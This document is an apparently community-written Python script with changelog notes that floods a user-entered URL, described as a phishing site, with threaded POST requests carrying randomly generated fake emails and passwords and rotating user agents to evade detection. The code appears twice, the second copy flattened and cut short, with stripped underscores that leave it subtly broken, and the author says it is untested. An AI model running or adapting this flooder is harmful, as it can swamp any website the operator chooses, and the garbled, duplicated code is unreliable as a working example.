def name_gen():
"""Generates a random name for the email."""
name_system = random.choice(["FullName", "FullFirstFirstInitial", "FirstInitialFullLast"])
first_name = names.get_first_name()
last_name = names.get_last_name()
if name_system == "FullName":
return first_name + last_name
elif name_system == "FullFirstFirstInitial":
return first_name + last_name[0]
return first_name[0] + last_name
def generate_random_email():
"""Generates a random email address."""
name = name_gen()
NumberOrNo = random.choice(["Number", "No"])
domain = random.choice(EMAIL_DOMAINS)
if NumberOrNo == "Number":
return name + str(random.randint(1, 100)) + domain
else:
return name + domain
def generate_random_password():
"""Generates a random password."""
return ''.join(random.choice(string.asciiletters + string.digits) for in range(8))
def send_posts(url):
"""Send POST requests with random email and password."""
while True:
email = generate_random_email()
password = generate_random_password()
data = {"a": email, "az": password}
ua = UserAgent()
user_agent = ua.random
headers = {'User-Agent': user_agent}
try:
response = requests.post(url, data=data, headers=headers)
logger.info(f"Email: {email}, Password: {password}, Status Code: {response.status_code}, User-Agent: {user_agent}")
except requests.RequestException as e:
logger.error(f"Request failed for {url}: {e}")
def main():
"""Main function to start flooding."""
try:
url = input("Enter the URL of the target you want to flood: ").strip()
if not url.startswith("http"):
raise ValueError("Invalid URL format")
threads = [threading.Thread(target=send_posts, args=(url,), daemon=True) for _ in range(THREAD_COUNT)]
for t in threads:
t.start()
for t in threads:
t.join()
except KeyboardInterrupt:
logger.info("Program terminated by user.")
except Exception as e:
logger.error(f"An error occurred: {e}")
if name == "main":
main()
v1.0
psudo Randomization improvements
User input sanitization
fix CybrZone not following pep8 convension
added error handling around post
logging introduced
Fix fakeuseragent library although changed to rotate periodically to avoid detection and to avoid the attacker being able to mass delete the fake user agents that match
optimised email gen to avoid duplicates
suggestions
connection pooling or async requests would be a funny challenge
rate limitting
thread_count paramerterize
feedback monitoring
ONE THING TO NOTE I DONT HAVE ACCESS TO A PHISHING WEBSITE RIGHT NOW (so not tested)
import threading import requests import random import string import names import logging from fake_useragent import UserAgent
Setup logging
logging.basicConfig(level=logging.INFO) logger = logging.getLogger(name)
Constants
EMAIL_DOMAINS = ["@gmail.com", "@yahoo.com", "@rambler.ru", "@protonmail.com", "@outlook.com", "@itunes.com"] THREAD_COUNT = 25
def name_gen(): """Generates a random name for the email.""" name_system = random.choice(["FullName", "FullFirstFirstInitial", "FirstInitialFullLast"]) first_name = names.get_first_name() last_name = names.get_last_name() if name_system == "FullName": return first_name + last_name elif name_system == "FullFirstFirstInitial": return first_name + last_name[0] return first_name[0] + last_name
def generate_random_email(): """Generates a random email address.""" name = name_gen() NumberOrNo = random.choice(["Number", "No"]) domain = random.choice(EMAIL_DOMAINS) if NumberOrNo == "Number": return name + str(random.randint(1, 100)) + domain else: return name + domain
def generate_random_password(): """Generates a random password.""" return ''.join(random.choice(string.asciiletters + string.digits) for in range(8))
def send_posts(url): """Send POST requests with random email and password.""" while True: email = generate_random_email() password = generate_random_password() data = {"a": email, "az": password} ua = UserAgent() user_agent = ua.random headers = {'User-Agent': user_agent} try: response = requests.post(url, data=data, headers=headers) logger.info(f"Email: {email}, Password: {password}, Status Code: {response.status_code}, User-Agent: {user_agent}") except requests.RequestException as e: logger.error(f"Request failed for {url}: {e}")
def main(): """Main function to start flooding.""" try: url = input("Enter the URL of the target you want to flood: ").strip() if not url.startswith("http"): raise ValueError("Invalid URL format")
if name == "main": main() v1.0 psudo Randomization improvements User input sanitization fix CybrZone not following pep8 convension added error handling around post logging introduced Fix fakeuseragent library although changed to rotate periodically to avoid detection and to avoid the attacker being able to mass delete the fake user agents that match optimised email gen to avoid duplicates
suggestions connection pooling or async requests would be a funny challenge rate limitting thread_count paramerterize feedback monitoring
ONE THING TO NOTE I DONT HAVE ACCESS TO A PHISHING WEBSITE RIGHT NOW (so not tested)